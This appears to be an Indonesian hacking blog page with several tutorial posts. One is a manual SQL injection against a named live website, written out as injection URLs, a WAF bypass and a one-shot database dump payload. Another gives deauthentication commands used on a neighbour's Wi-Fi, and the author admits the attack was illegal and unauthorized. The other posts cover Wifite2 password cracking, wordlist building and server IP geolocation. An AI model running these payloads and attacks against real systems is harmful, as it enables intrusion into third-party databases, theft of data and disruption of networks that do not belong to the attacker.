Rabu, 08 Juli 2020

Tutorial SQL Injection Manual Mudah

  

      Halo guys, sekarang gua mau share tentang SQL manual. Bagi yang ga tau SQL Injection itu apa, SQL Injection adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data (database) sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter karakter pelolos yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. Ok langsung aja ke teknik nya

1. Dorking dulu

      Nah bagi yang ga tau dork itu apa, google dork adalah fitur pencarian yang disediakan oleh google untuk mencari artikel yang berkaitan dengan query yang kita masukkan, nah dork yang umum adalah misalnya:

inurl: site.sch.id .php?id=
inurl: site.go.id php?id=
inurl: product.php?id=

Bagi yang ga tau cara dorking gimana :



Kalo udah tentuin dulu targetnya

Nah disini target gua seperti kemaren juga

https://mashailalqasr.com/eng/products.php?catid=1

Untuk mengecek nya, masukkan string ( ' ) dibelakangnya, Like this

https://mashailalqasr.com/eng/products.php?catid=1'



2. Order By

Terus kita cari jumlah kolomnya ada berapa dengan menambahkan order by dibelakangnya:

https://mashailalqasr.com/eng/products.php?catid=1' order by 1--+-

saat dilihat error, coba kita hapus ( ' ) dibelakang angka 1

https://mashailalqasr.com/eng/products.php?catid=1 order by 1--+-


Dan hasilnya mulus, kita cari jumlah kolom nya lagi sampe nemu error, caranya;

https://mashailalqasr.com/eng/products.php?catid=1 order by 1--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 2--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 3--+- ~ Mulus
(Gua skip aja)
https://mashailalqasr.com/eng/products.php?catid=1 order by 36--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 37--+- ~ Nah ini Burik ini (error)

NB: kalo error di angka 40 dan angka 39 mulus, berarti jumlah kolom hanya sampai 39, kalo mau sekalian cek bisa di inject kolomnya atau ngga, langsung masukin aja order by 100 :v


Kolom 36 masih mulus, kita cek kolom 37


Nah ini burik namanya, langsung hantam aja!

3. Union Select

Caranya, tadi kan jumlah kolom hanya sampai 36, berarti kita masukin:

https://mashailalqasr.com/eng/products.php?catid=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-

Kalo udah, nanti bakal ada error not acceptable blablabla by mod_security, nah itu adalah WAF nya, hal itu biasa terjadi pas lagi mau inject target :v cara menembusnya pakai command ini:

Pengganti union select:  /*!12345union*/+/*!12345select*/+

Jadinya kita masukin seperti Ini:

https://mashailalqasr.com/eng/products.php?catid=1/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-

Result:


Nah, jangan lupa scroll ke bawah untuk liat angka togelnya, disitu angka togelnya adalah 5
Jadi yang kita pakai untuk ngintip basis data/database) nya terletak di angka 5. Langsung aja kita dump dengan menggunakan DIOS (Dump In One Shot)

DIOS:   /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)

Jadinya seperti ini:

https://mashailalqasr.com/eng/products.php?catid=1/*!12345union*/+/*!12345select*/+1,2,3,4, /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-

Nanti hasilnya seperti ini:


Untuk permisalan, gua mau dump, semisal gua mau dump tables banks nya :v



Ok, Sekian dulu kalo ada yang mau ditanyain silahkan di kolom komentar

Minggu, 05 Juli 2020

Teknik Penyerangan Terhadap Wi-Fi Dan Cara Menangkalnya #1

  
     

      Bro? lu tau wifi kan? iya wifi sebagai Access Point internet seseorang. Ternyata bisa dibuat down juga oleh kita, bagaimana caranya? dan bagaimana mencegahnya? simak berikut ini:

1. Apa saja keamanan Wi-Fi?

      Ada tiga protokol keamanan dalam jaringan WiFi, yaitu WEP (Wired Equivalent Privacy), WPA (Wi-Fi Protected Access), dan WPA2 (Wi-Fi Protected Access versi 2). Ada tiga aspek keamanan yang dapat diharapkan dari implementasi protokol keamanan, yaitu autentisitas (, integritas, dan kerahasiaan (confidentiality). Tapi tenang saja, itu semua bisa di tembus dengan beberapa persyaratan. Dan kalo persyaratannya sudah terpenuhi, siap siap "Tidak ada Wi-Fi yang aman" jangan lupa dibuat pansos juga ya, biar dibilang "Hekel plo, ampun stah" aowkwkwk:v

2. Persyaratan Supaya Berhasil

    Sebenarnya ada 5-7 persyaratan, tapi disini gua jelasin 3 persyaratan yang paling ber efek supaya teknik penyerangan Wi-Fi berhasil:

> Jarak

      Ya, yang pertama adalah jarak. Bukan jarak antara kita ya aowkwkw. Jarak yang gua maksud adalah jarak si peretas dengan AP (Access Point). AP disini yang gua maksud adalah sumber internet nya atau wifi nya sendiri

> Wireless Adapter

     Yang kedua adalah wireless Adapter. Disini gua pake TP-Link WN722N, usahakan cari yang range nya jauh, karena ini juga menentukan peluang berhasil atau ngga!. Kenapa saya milih TP-Link? karena cari yang model alpha / Atheros disini susah, kaya nyari cewek yang cuma chatan sama satu cowok :v

Ini TP-Link yang gua pake:









Bagi kalian yang TP-Link nya error, bisa baca disini 

> Prosesor minimal 3 / lebih

      Yang terakhir adalah prosesor dengan jumlah minimal 3, prosesor ini bisa disetting di virtual box dengan settings -> processor -> Pilih minimal 3 / lebih. Kita akan membutuhkan banyak tab terminal baru untuk melakukan serangan. ok langsung ke caranya

3. Melakukan serangan

A. Setting wireless adapter ke mode monitor

      Yang pertama harus kalian lakukan adalah memastikan Wireless Adapter dalam keadaan monitor, kalo tidak dalam keadaan monitor, ya ga bakal bisa nargetin lah :v

root@localhost:~# iwconfig wlan0 mode monitor
  
Karena interface gua adalah wlan0 makanya iwconfig wlan0, untuk mengecek nya ketik:

root@localhost:~# iwconfig

 

Setelah itu waktunya kita monitor, tapi sebelumnya jalankan airmon-ng dengan perintah:

B. Airmon-ng

root@localhost:~# airmon-ng start <interface anda> 
root@localhost:~# airmon-ng start wlan0


  
Interface nya sesuaikan dengan interface kalian sendiri.

C. Airodump-ng

Selanjutnya adalah airodump-ng, ya command ini untuk monitoring jaringan disekitar kita, dengan cara:

root@localhost:~# airodump-ng <interface kalian yang sudah dalam keadaan monitor>
root@localhost:~# airodump-ng wlan0  

Karena wlan0 saya sebelumnya sudah dalam keadaan monitor, sebenarnya tidak terlalu penting untuk menjalankan airmon-ng :v

D. Identifikasi dan tentukan target


Nah disini gua targetin dengan ESSID dengan nama "INDIRA" dia tetangga gua :v. ESSID adalah singkatan dari Service Set Identifier, fungsinya yaitu memberikan nama untuk wireless router maupun access point anda.
 
E. Menentukan Station Untuk Inject Client

Nah disini kalian harus menentukan client yang mau kalian track trace root nya. Dengan perintah:

root@localhost:~# airodump-ng wlan0 --bssid FC:A6:CD:82:EF:18 --channel 1 

Seperti gambar:

 
--bssid : bssid adalah alamat dari Access Point dengan ESSID "INDIRA" 
--channel : Channel ini adalah channel dari ESSID "INDIRA" dan ingat, channel ini BUKAN  yang di sebelah kiri atas, kalo salah ya ga bakal bisa, lalu kita ENTER.

 


Station : adalah alamat dari client (Yang terhubung dengan Access Point)
BSSID : adalah alamat dari Access Point nya, lanjut lur.

F. Aireplay-ng

Disini gua bakal pake aireplay untuk deauth client, dengan perintah;

root@localhost:~# aireplay-ng --deauth 0 -c <station atau alamat client nya> -a <bssid Acces Pointnya> <interface anda yang dalam keadaan monitor>

Atau lebih jelasnya gini:

root@localhost:~# aireplay-ng --deauth 0 -c 58:5F:F6:4D:45:E1 -a FC:A6:CD:82:EF:18 wlan0



Karena ada 2 client yang terhubung, biar makin greget kita trace juga dua duanya :v


Nah proses deauth nya udah berjalan, dan target akan marah marah dalam hati wkwkwk, bagi yang ga tau deauth itu apa

DeAuth = Dead Authentication yang berarti memaksa client untuk memutus jaringan terhadap Access Point tanpa persetujuan dari client dan ini cukup greget :v

FYI: 10:05:44  Sending 64 directed DeAuth (code 7). STMAC: [58:5F:F6:4D:45:E1] [ 0| 2 ACKs]

Dibelakang kan ada [ 0| 2 ACKs] kalo angka depannya udah berubah jadi 0 itu berarti target sudah tidak ada sinyal sama sekali, saya jamin itu semua.

Untuk mengecek benar atau tidaknya coba jalankan airodump-ng sambil menjalankan aireplay-ng, seperti gambar:


Dan bisa dilihat di angka 0 yang saya block, power = 0 xixixi, pastikan kalian sudah dapet izin untuk melakukan pentest jaringannya, jangan kaya gua om, illegal wkwkwk. Jangan ditiru :v karena gua pentest tanpa sepengetahuan si pemilik, dan satu lagi jangan lupa dibuat pansos, karena dengan pansos mastah akan mengenalmu :v


4. Melakukan pengamanan

Ini berdasarkan pengalaman Wi-Fi sodara gua di jakarta yang pernah gua test sebagai percobaan dan sudah diberi izin oleh sodara gua, berikut caranya menghindari agar Wi-FI tidak mudah di retas:

1. Gunakan password yang susah

Hal ini adalah wajib hukumnya, agar peretas tidak bisa meretas capture data yang telah didapatkan di tangan hacker, gunakan kombinasi simbol, huruf besar, huruf kecil, angka dsb. seperti: &O!(^#**!^1137#&()!&r^#* ~ ini permisalan doang ya !  

2. Aktifkan Network Encryption

Kalo gua cukup tidak terlalu pengaruh dengan enkripsi saat melakukan pentest. Tapi bagi yang pemula pasti kesulitan karena dulu saya juga seperti anda :v. Maksudnya Network Encryption itu apaan bos? seperti contoh WPA2 / WPA adalah network encryption dan dikombinasikan dengan password yang sulit

3. Buat lah pendek jangkauan WI-Fi anda  
  
Semakin pendek jangkauan Wi-Fi anda, semakin lama peretas akan meretas Wi-Fi anda, untuk mengrim frames dan Beacons diperlukan jarak yang dekat. Disetiap ada kelebihan pasti ada kekurangan :)

sekian dari gua DemonX, jika ada yang mau ditanyakan silahkan hubungi gua 

Kalo ada saran konten silahkan tulis di kolom komentar :v 

Rabu, 01 Juli 2020

Kenapa TP-Link WN722N error saat Monitor mode? Berikut mengatasinya

   
      Halo guys, back again bersama aing DemonX. Sekarang gua mau share ke kalian cara mengatasi Wireless USB Adapter TL-WN722N tidak bisa melakukan monitoring mode. Trouble nya seperti apa? Simak Lebih Lanjut.


1. Permasalahan

A. Tidak bisa monitor mode


Masalah yang pertama adalah tidak bisa monitor mode. Kalo ga bisa monitor mode, ya tidak bisa melakukan airodump-ng :v. Maka otomatis tidak bisa menjalankan tools yang lainnya, misal wifite, airgeddon, fluxion dll. kalo ga bisa monitor mode auto useless :v

B. Tidak bisa airodump-ng 


Yang ke 2 adalah tidak bisa melakukan airodump-ng, kalo sudah begini apa yang mau dilakuin? hahaha :v

C. Tidak bisa melakukan aireplay-ng


Aireplay-ng berfungsi untuk melakukan deauth (Memutus sambungan Client ke Access Point), kalo kita mau melakukan handshake snooper, maka harus memutus client (yang terhubung) dengan Acces Point (AP) atau hotspot nya (Sumber wifi), begitu juga dengan wifiphisher

D. Phy Null saat melakukan monitoring 


Ini lah core of the core dari permasalahan itu semua wkwkwk, yang harusnya phy berubah jadi phy0 atau phy1 tapi malah null (kosong)

2. pemecahan Masalah

FYI: Pastikan kalian masuk sebagai user root dengan perintah:

kali@kali:~$ sudo su

(lalu masukkan password kalian sendiri)
(nanti akan berubah menjadi)

root@namakalian:~# 

1. Pastikan kernel linux anda versi 5.6.0 (yang terbaru)

yang pertama kernel kalian harus versi terbaru cara mengeceknya:

root@localhost:~# uname -r

karena kalo pakai kernel 5.5.0 bisa saja tidak work, kalo mau mendapatkan versi 5.6.0 upgrade dan update kali kalian dengan cara perintah:

root@localhost;~# apt-get update
root@localhost:~# apt-get upgrade

Kalo kernel kalian tidak bisa di upgrade, coba untuk install ulang OS kali Linux kalian di Virtual Box     

2. :~# rmmod r8188eu.ko



Nah itu error karena saya udah hapus duluan tadi hehehe, kalo belom bakal mulus ga ada error apa", kalian hapus dulu file r8188eu.ko dengan perintah di atas  agar nanti bisa kita install dengan 8188eu terbaru 

3. echo "blacklist r8188eu.ko" > "/etc/modprobe.d/realtek.conf"

Nah kita blacklist r8188eu.ko supaya ga bikin error saat monitor mode, ingat ya itu disimpan di dalam folder /etc/modprobe.d/ dengan file bernama realtek.conf

4. :~# git clone https://github.com/aircrack-ng/rtl8188eus

Kalian install github nya dari link diatas lalu masuk ke directory nya dengan perintah

5. :~# cd rtl8188eus



Kalo sudah, kita lanjut lagi

6. :~/rtl8188eus# make

Make ini supaya yang dibutuhkan oleh driver kita tersedia di kali linux.

 
Karena saya udah make duluan, jadi langsung make [1]:leaving directory

7. :~rtl8188eus# make install

Nah ini berfungsi untuk installing ke dalam system kita (Pemasangan)


Nah nanti bakal keluar tulisan

install -p -m 644 8188eu.ko  /lib/modules/5.6.0-kali2-amd64/kernel/drivers/net/wireless/
/sbin/depmod -a 5.6.0-kali2-amd64

8. :~/rtl8188eus# cd

Lalu kembali ke akses root kalian dan ketik perintah ini:

9. :~# modprobe 8188eu

Untuk menjalankan dari perintah "make" yang tadi agar berjalan karena r8188eu.ko sudah diganti dengan 8188eu


10. :~# airmon-ng check kill

Untuk mengecek apakah sudah bisa digunakan untuk kill PID



11. cabut dan pasang kembali TL-WN722N

Ini dilakukan supaya me refresh drivers, lakukan jeda sekitar 10 detik.

12, :~# ip link set wlan0 down

Ini supaya mencegah PID yang sudah di kill muncul lagi

13. :~# iw dev wlan0 set type monitor

Atau bisa juga kalian ketik

:~# iwconfig wlan0 mode monitor

lalu kalian cek dengan perintah

14. :~# iwconfig
 



Nah nanti bakal berubah dari mode managed ke mode monitor

15. :~# airodump-ng wlan0

Nah terakhir kalian ketik perintah diatas dan hasilnya:


Ok sekian dulu tutorial error Wireless adapter TP Link nya :v


kalo ada yang mau request untuk materi selanjutnya tulis di kolom komentar ea :v

Selasa, 30 Juni 2020

Cara Membuat Wordlist sendiri

      Bro? Kalian sehat kan? Bagi yang pacaran semoga langgeng, dan bagi yang jomblo mari berkumpul ahahaha :v, back lagi di blog aing DemonX, setelah kemarin gua share tentang tutorial hack wifi, sekarang gua mau share lagi cara buat wordlist, nantinya wordlist ini bisa di custom sendiri oleh kalian. Langsung aja ke caranya

1. About cupp

Bentuk otentikasi yang paling umum adalah kombinasi nama pengguna dan kata sandi atau frasa sandi. Jika kedua nilai kecocokan disimpan dalam tabel yang disimpan secara lokal, pengguna diautentikasi untuk koneksi. Kekuatan kata sandi adalah ukuran dari kesulitan dalam menebak atau menghancurkan kata sandi melalui teknik kriptografi atau pengujian otomatis nilai-nilai alternatif yang berbasis perpustakaan.

Kata sandi yang lemah mungkin sangat pendek atau hanya menggunakan karakter alfanumerik, membuat dekripsi menjadi sederhana. Kata sandi yang lemah juga bisa menjadi kata yang mudah ditebak oleh seseorang yang membuat profil pengguna, seperti ulang tahun, nama panggilan, alamat, nama hewan peliharaan atau kerabat, atau kata umum seperti Tuhan, cinta, uang atau kata sandi.

Itulah mengapa CUPP lahir, dan dapat digunakan dalam situasi seperti tes penetrasi hukum atau investigasi kejahatan forensik.



2. Installasi Cupp

Disini pertama tama kalian cloning tools githubnya https://github.com/Mebus/cupp :

root@localhost:~# git clone https://github.com/Mebus/cupp 

Kalo udah kalian masuk ke directory nya 

root@localhost:~# cd cupp
root@localhost:~/cupp# ls     (Untuk Nampilkan List)

Selanjutnya kalian berikan akses ke file cupp.py dengan ketik perintah

root@localhost:~/cupp# chmod +x cupp.py 

Dan terakhir kalian jalankan perintah

root@localhost:~/cupp# ./cupp.py -i



kalian isi List nya sesuai keinginan kalian

Example:




Nanti hasilnya akan di simpan di dalam folder cuppnya
kalo mau liat tinggal kalian ketik ls

3. About Mentalist

Mentalist adalah alat grafis untuk pembuatan daftar kata kustom. Itu menggunakan paradigma manusia umum untuk membangun kata sandi dan dapat menampilkan daftar kata lengkap serta aturan yang kompatibel dengan Hashcat dan John the Ripper.

4. Installasi mentalist

Yang ke empat kita install mentalist nya lewat github:

Remember: Kalian Install Lagi diluar directory cupp 

root@localhost:~/cupp# cd   (cd doang ya lur)

root@localhost:~# git clone https://github.com/sc0tfree/mentalist.git 
  
Terus kalian masuk ke dalam folder mentalist nya 

root@localhost:~# cd mentalist
root@localhost:~mentalist# ls

Nah saat kalian ketik "ls" pasti bakal ada file setup.py, kalian install setup.py dengan perintah:


root@localhost:~/mentalist# python3 setup.py install


Kalo udah, kalian tinggal ketik


root@localhost;~/mentalist# mentalist

kalo udah, bakal muncul window baru dari mentalist nya 




Nah tinggal kalian custom sendiri, caranya kalian klik ikon + di sebelah base word,Like This:





Disitu kalian klik ikon + di sebelah base words dan terserah kalian mau bikin apa aja xixixi

Kalo mau tambah attribute, kalian klik icon + di kanan atas, yang sudah saya custom:



kalo udah siap, tinggal di save, klik di kanan atas "Load/Save"


Kalian tentukan dulu letak gambarnya, kalo gua sih mau save di file cupp, caranya kalian klik tanda minus di atas  nya dan tentuin letak nya




kalo udah tinggal klik save dan saya coba cek di directory cupp nya:



Dan BBBOOOOOMMMMMM!!!!1

Selanjutnya terserah kalian mau digunakan untuk apa wordlistnya xixixi

Segitu dulu dah bikin wordlist nya yang mudah :v kalo mau dibikin manual ya gak papa hehehe

Kalo ada yang mau ditanyain tulis di kolom komentar ya

Rabu, 24 Juni 2020

Information Gathering dengan Blue Thunder

      Halo guys, sekarang gua mau share tentang Blue Thunder Tools. Tools ini untuk melacak dan memberikan informasi tentang suatu address. Ok Demon mau basa basi dulu

1. About Blue Thunder

    Ambil informasi tentang alamat ip atau nama host Alat ini ditulis dalam bentuk perl karena Anda dapat memberi tahu -_- Anda dapat membantu kami dengan berlangganan ke saluran youtube kami:. https://goo.gl/FpAkp5.: sebelum membuka alat gunakan perintah ini chmod + x blue_thunder_IP_locator.pl tidak ada yang istimewa itu hanya memberikan informasi dari situs web ini http://ip-api.com/ periksa terima kasih telah menggunakan alat kami.

Dikutip dari Developer: the shadow brokerss

2. Installasi Tools
   
A. root@localhost:~# apt install liblocal-lib-perl libjson-perl



Nah antara package yang satu dengan seterusnya dikasih spasi ya lur :v 
FYI: Jangan lupa pakai perintah "sudo" sebagai akses root, atau kalo ga mau ribet ngetik "sudo" langsung masuk ke root nya dengan perintah "sudo su" jadi yang sebelumnya kalian ketik "sudo apt-get ...." langsung menjadi "apt-get ....."

B. root@localhost:~# apt-get upgrade libjson-perl 



NB: Untuk Termux sama saja penginstallannya

C. root@localhost:~# git clone https://github.com/theshadowbrokerss/Blue-Thunder-IP-Locator-

 

Dan Kalo sudah, kalian masuk ke directory nya dengan ketik perintah:

root@localhost:~# cd Blue-Thunder-IP-Locator-

Dan ketik perintah "ls" untuk menampilkan list

beri akses untuk file blue_thunder.py dengan ketik perintah

root@localhost:~# chmod +x blue_thunder.py

Kalo kalian ga mau ribet, cukup ketik perintah:

root@localhost:~# chmod +x *

D. Running script

Kalo kalian ga mau kasih akses yang lebih mudah, kalian harus jalankan sesuai bahasanya, karena menggunakan bahasa perl makanya format file .pl

root@localhost:~# perl blue_thunder.pl 

E. Menentukan Target

Untuk nentuin target ada banyak cara, tapi gua disini bakal menggunakan lbd (Tools Bawaan kali)

root@localhost:~# lbd www.detik.com

Nanti bakal keluar IP Server 

Checking for DNS-Loadbalancing: FOUND
detik.com has address 103.49.221.211
detik.com has address 203.190.242.211

Checking for HTTP-Loadbalancing [Server]:
 dtk24
 dtk10
 FOUND

Checking for HTTP-Loadbalancing [Date]: 08:54:35, 08:54:35, 08:54:35, 08:54:35, 08:54:35, 08:54:35, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:37, 08:54:37, 08:54:37, 08:54:37, 08:54:37, 08:54:37, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:40, 08:54:40, 08:54:40, 08:54:40, 08:54:40, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:42, 08:54:42, 08:54:42, 08:54:42, 08:54:42, NOT FOUND

Checking for HTTP-Loadbalancing [Diff]: FOUND
< Server: dtk24
> Server: dtk10

detik.com does Load-balancing. Found via Methods: DNS HTTP[Server] HTTP[Diff]  


kalo server nya ga ke detect, cari target lain :v

dtk24 IP Server: 103.49.221.211
dtk10 IP Server: 203.190.242.211

bebas mau yang mana aja, tapi gua mau scan yang depannya 103 

root@localhost:~# perl blue_thunder.py 103.49.221.211



Dan Enter

3. Google Maps

Nanti bakal keluar geo lat dan geo longitude dan kalian pastekan di google maps like this

  
Ok lur, itu aja yang mau gua share. kalo ada yang mau ditanyain, tulis di kolom komentar ya

Senin, 22 Juni 2020

Tutorial Hack Wifi dengan Wifite2

      Hallo guys, sekarang aing mau share tentang cara Hack Wifi dengan tools Wifite2. Supaya kalian bisa monitoring mode nya, harus pakai Wifi Adapter. kalo pake wireless compat doang mah ya ga bisa, kalo mau berhasil harus ada usaha A6. carding misalnya aowkwkwkw. Nah disini gua sih pake TL WN722N sebagai wlan0 nya. Kalo ga ada wireless adapter nya gimana Demon? ya ga bisa monitor mode.

1. About Wifite

Repo ini adalah penulisan ulang lengkap wifite, skrip Python untuk mengaudit jaringan nirkabel.

Wifite menjalankan alat audit nirkabel yang ada untuk Anda. Hentikan menghafal argumen perintah & beralih!

Wifite dirancang untuk menggunakan semua metode yang dikenal untuk mengambil kata sandi dari titik akses nirkabel (router). Metode-metode ini meliputi:

    WPS: Serangan Offline Pixie-Dust
    WPS: Serangan PIN Brute-Force Online
    WPA: Tangkapan Jabat Tangan WPA + celah offline.
    WPA: Retakan Hash PMKID + luring offline.
    WEP: Berbagai serangan yang diketahui terhadap WEP, termasuk fragmentasi, chop-chop, aireplay, dll.

Jalankan wifite, pilih target Anda, dan Wifite akan secara otomatis mulai mencoba menangkap atau memecahkan kata sandi.
 


2. Installasi

A. Tools Pendukung

Sebelumnya, kalian harus install beberapa tools dibawah ini sebagai pendukung yang hukumnya fardu ain :v
 
tshark: Untuk mendeteksi jaringan WPS dan memeriksa file pengambilan jabat tangan.
    reaver: Untuk serangan WPS Pixie-Dust & brute-force.
        Catatan: Alat cuci Reaver dapat digunakan untuk mendeteksi jaringan WPS jika tshark tidak ditemukan.
    bully: Untuk serangan WPS Pixie-Dust & brute-force.
        Alternatif untuk Reaver. Tentukan --bully untuk menggunakan Bully, bukan Reaver.
        Bully juga digunakan untuk mengambil PSK jika reaver tidak dapat setelah memecahkan PIN WPS.
    coWPAtty: Untuk mendeteksi tangkapan jabat tangan.
    pyrit: Untuk mendeteksi tangkapan jabat tangan.
    hashcat: Untuk memecahkan hash PMKID.
        hcxdumptool: Untuk mengambil hash PMKID.
        hcxpcaptool: Untuk mengkonversi paket PMKID ke dalam format hashcat.
 



FYI: Yang belum di install di Kali adalah hcxdumptool dan hcxpcaptool
hcxdumptool: https://github.com/ZerBea/hcxdumptool
hcxpcaptool:  https://github.com/ZerBea/hcxtools 

Jalankan dengan perintah:

kali@kali:~$ sudo git clone (link diatas)    ~tidak sebagai super user (root)
root@localhost:~# git clone (link diatas)   ~sebagai super user (root)

B. Install github

Untuk install github nya:

:~# git clone https://github.com/derv82/wifite2


:~# cd wifite2

Jika sudah masuk ke direktori nya ketik:

:~# ls

:~# chmod +x Wifite.py

FYI chmod berfungsi untuk mempermudah kita menjalankan script, karena untuk menjalankan script pasti pakai bahasa program, tapi kita hanya perlu ketik " ./ " didepannya untuk mempersingkat

C. Pastikan Semuanya siap

Hal yang perlu diperhatikan sebelum melakukan aksi :v

> wireless interface dalam keadaan monitor 

kenapa gitu mon? Karena kalo dalam keadaan "managed" atau "auto" ga bakal bisa deteksi wireless disekitar kita, caranya gimana mon?

;~# iwconfig wlan0 mode monitor

Like this:

 

> ifconfig interface dalam keadaan up

kenapa lagi tuh mon? kalo ifconfig interface dalam keadaan down, ga papa juga, cuma lebih baik di up saja, caranya gimana?

:~# ifconfig <interface> up

karena interface aing wlan0 jadinya

:~# ifconfig wlan0 up

Like this:


 > Wordlist

      Kalo dari bawaan wifitenya sudah ada wordlist nya, coba kalian "ls" akan ada file yang namanya "wordlist-probable.txt" tapi kalo mau di custom dengan wordlist lain, bisa kalian tumpuk, atau file bawaan di hapus dan diganti dengan wordlist kalian, lusa demon share tentang cara bikin wordlist bikinan sendiri ea :v 

Cara modif default wordlist supaya jadi wordlist kita gimana bang?

kalian download dulu wordlist nya disini
bisa melalui git atau zip, kalo zip kalian klik tulisan "clone or download' yang back ground nya hijau dan klik download zip

kalo udah kalian masuk ke folder Downloads kalian

:~# cd /home/usernamekalian/Downloads

karena usernamenya tazmanian jadi gua masuk dgn ketik

:~# cd /home/tazmanian/Downloads

Nah nanti bakal ada file format .zip yang udah kalian install

cara nya kalian ketik:

:~# unzip indonesian-wordlist-master.zip

Like this:



Nah kalian masuk ke folder yang udah kalian unzip

:~# cd indonesian-wordlist-master

Dan kalian ketik "ls" untuk nampilin list, Kalo udah kalian copy ke folder wifite2 yang berada di akses root tadi dengan ketik perintah:

:~# cp 00-indonesian-wordlist.lst /root/wifite2

Lakukan sampai wordlist yang ke enam, lakukan berulang kali lur xixixi  dan kalian masuk ke directory wifite2 tadi dan ketikan "ls"

Dan jangan lupa kalian hapus file bawaannya yaitu wordlist-probable.txt dengan perintah:

:~# rm -rf wordlist-probable.txt

Selanjutnya kalian edit nama file dengan perintah:

:~# nano 00-indonesian-wordlist.lst 

Dan keluar dengan ketik di Host Key anda Ctrl + X, Save modified buffer? Klik Y Y, file name kalian ubah menjadi "wordlist-probable.txt", save file under different name? klik Y di hostkey

D. Waktunya tempur

Kalian ketik:

:~# ./Wifite.py 

tunggu sampai target anda muncul



kalo sudah muncul tekan tombol Ctrl + c di keyboard anda dan pilih nomer target yang mau kalian retas :v  disini gua pake essid "tazmanian xploit" dgn nomer 1, jadi gw ketik angka 1

Selanjutnya akan ada 5 tahap, menurut gua 4 tahap yang lainnya ga terlalu penting,  yang terpenting adalah tahap ke 5

Like this:



Tahap 5 adalah proses deauth dan saat target memasukkan password akan terekam di layar kita dan akan langsung menjalankan wordlist nya yang sudah diedit tadi, jika client dari Access Point sudah memasukkan password nya, akan otomatis di brute force :v dan result nya:


NB: Kita menggunakan wordlist untuk menebak hasil capture handshake nya, kalo password belom ke crack, anda harus menggunakan wordlist lain sampai benar benar ke crack :v

Sekian dulu dari aing DemonX, kalo ada yang mau ditanyain hubungin DemonX

kalo ada saran atau request silahkan tulis di kolom commentar ya :v

Highlited Post By DemonX

Intip Dunia IT secara Universal

       Hello guys ini postingan perdana Demon untuk blogspot, sekarang demon mau basa basi dulu seputar Hacking dan dunia IT. Saat ini kedu...